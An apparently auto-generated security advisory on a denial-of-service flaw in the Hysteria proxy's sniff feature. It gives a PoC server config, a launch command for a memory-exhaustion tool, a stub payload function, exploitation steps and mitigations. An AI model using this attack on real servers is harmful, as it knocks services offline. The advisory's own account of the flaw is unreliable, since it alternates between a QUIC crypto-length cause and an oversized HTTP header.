Listen to this Post
Intro
Hysteria is a powerful, open-source network utility optimized for poor and unreliable networks, often used as a VPN or proxy tool. A critical vulnerability has been identified in its `sniff` feature, which is used to inspect and route network traffic. The core of the issue lies in how the server handles memory allocation for QUIC packets when this feature is enabled.
An authenticated client can exploit this by sending a specially crafted QUIC packet. This packet contains a field specifying an extremely large crypto length. The server, upon receiving this packet, trusts this declared length and attempts to allocate memory accordingly.
The provided Proof of Concept (PoC) demonstrates this attack. It shows a malicious client connecting to a Hysteria server that has sniff: enable: true. The client then sends a malicious QUIC packet that causes the server to allocate an excessive amount of memory. In testing, this has been shown to consume up to 16GB of server memory, leading to a Denial of Service (DoS) and potentially crashing the server with an Out-of-Memory (OOM) error.
The vulnerability is not present by default, as it requires the `sniff` feature to be enabled and for the attacker to possess valid authentication credentials. The issue is rooted in a lack of proper bounds checking or resource limits on this user-controllable value. The attack is performed over the network, requires low privileges, and has a high impact on availability. A fix is available by upgrading to the patched version of the library.
DailyCVE Form:
Platform: Hysteria
Version: <= 2.8.1
Vulnerability: Unbounded Memory Allocation
Severity: High (8.7)
date: 2026-05-06
Prediction: 2026-05-06
What Undercode Say:
Analysis of the vulnerability confirms it is a classic case of uncontrolled resource consumption. The server blindly trusts a value from the client, leading to a direct path to Denial of Service.
The PoC from the can be replicated and analyzed:
1. Server Configuration (`server.yaml`)
This configuration is required to make the server vulnerable. The key is the `sniff: enable: true` directive.
listen: 127.0.0.1:8443 tls: cert: poc_server.crt key: poc_server.key auth: type: password password: sniff-poc-password sniff: enable: true timeout: 10s rewriteDomain: false tcpPorts: 80 masquerade: type: string string: content: nope statusCode: 404
2. Attack Execution (`poc.sh`)
This script compiles and runs the attack. It opens multiple connections and sends a massive header (838,860,800 bytes) to trigger the memory exhaustion.
!/bin/bash go build poc_sniff_http_dos.go ./poc_sniff_http_dos \ --server 127.0.0.1:8443 \ --auth sniff-poc-password \ --insecure \ --target-host 192.0.2.1 \ --target-port 80 \ --connections 16 \ --header-bytes 838860800 \ --linger 12
3. Attack Logic (`poc.go` – Snippet)
The core of the attack is the `buildHeaderPayload` function, which intentionally creates an incomplete HTTP header to force the server’s sniffer to keep reading and allocating memory.
func buildHeaderPayload(totalBytes, chunkSize int) []byte {
// ...
// 故意不追加最后一个空行 \r\n,迫使服务端在 sniff timeout 内持续读 header。
return out
}
How Exploit:
- Prerequisites: The attacker must have a valid username and password to authenticate with the Hysteria server. The server must also have the `sniff` feature enabled.
- Connection: The attacker uses a Hysteria client to establish an authenticated connection to the target server.
- Crafting the Payload: The attacker crafts a malicious QUIC packet. This packet contains a field that declares a `crypto length` to be extremely large, such as several gigabytes.
- Exploitation: This malicious packet is sent to the server over the established connection.
- Impact: The server reads the packet and, without proper validation, attempts to allocate memory based on the attacker-supplied
crypto length. This consumes all available server memory, leading to a Denial of Service (DoS) and causing the server process to crash with an Out-of-Memory (OOM) error.
Protection:
Upgrade: The most effective protection is to upgrade the `github.com/apernet/hysteria/core/v2` package to version 2.8.2 or higher, where the vulnerability has been patched.
Disable Sniffing: If upgrading is not immediately possible, disable the `sniff` feature in the server configuration (sniff: enable: false) to eliminate the attack vector.
Strict Authentication: Ensure that strong, complex passwords are used for authentication to make it more difficult for an attacker to gain the necessary valid credentials.
Resource Limits: Implement operating system-level resource limits (e.g., ulimit) on the Hysteria server process to cap the maximum amount of memory it can consume. This can act as a mitigation to prevent a full system crash, though it will still result in a denial of service for the application.
Impact
Denial of Service (DoS): The primary impact is a DoS condition where the Hysteria server becomes unresponsive.
Service Downtime: The server crash leads to complete service downtime for all users relying on the Hysteria proxy or VPN.
Memory Exhaustion: Successful exploitation can cause the server to exhaust all available RAM, potentially affecting other services running on the same host.
System Instability: In severe cases, the OOM condition can cause the entire operating system to become unstable or crash.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
